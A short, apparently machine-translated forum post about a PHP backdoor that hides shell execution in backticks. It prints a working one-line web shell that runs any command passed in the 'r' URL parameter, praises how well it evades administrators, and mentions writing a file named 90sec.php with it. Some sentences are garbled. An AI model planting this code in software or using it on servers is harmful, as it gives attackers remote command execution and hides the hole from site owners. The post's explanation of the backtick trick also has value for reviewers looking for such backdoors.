I accidentally saw a piece of code that seemed to have no problem. It was indeed a fatal backdoor code. Here, a backtick ` was used that ordinary PHPer paid little attention to. The string contained in the backtick was equivalent to for the shell_exec function.
The disguise is very good and can be easily ignored by administrators.
$selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; }
I just saw this code and I think everyone will say that there is no problem, but careful friends will also find that the following variables are wrapped by a symbol. Why is it like this since it is a variable?
And it’s not a single quote. This is the key. This symbol is a key under Esc (next to the exclamation mark!),
The same effect as system(); can be achieved by echo `system command`;
If you don’t believe it, you can test it Can list directories I am Ma>>D:web90sec.php
I have tested successfully using appserv and virtual host.